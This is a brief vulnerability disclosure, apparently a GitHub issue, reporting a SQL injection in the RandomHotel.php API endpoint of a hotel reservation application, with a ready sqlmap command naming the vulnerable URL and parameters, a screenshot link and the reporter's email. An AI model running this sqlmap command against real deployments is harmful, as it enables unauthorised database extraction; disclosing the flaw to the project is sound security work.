exists sql inject in /controller/api/RandomHotel.php sqlmap -u "http://10.211.55.10/controller/api/RandomHotel.php?key=TheHotelReversationApplication&city=1" <img width="854" alt="image" src="https://user-images.githubusercontent.com/29982232/67927801-7c72c880-fbf4-11e9-90a5-d82f67504e64.png"> author:kejie.chen@dbappsecurity.com.cn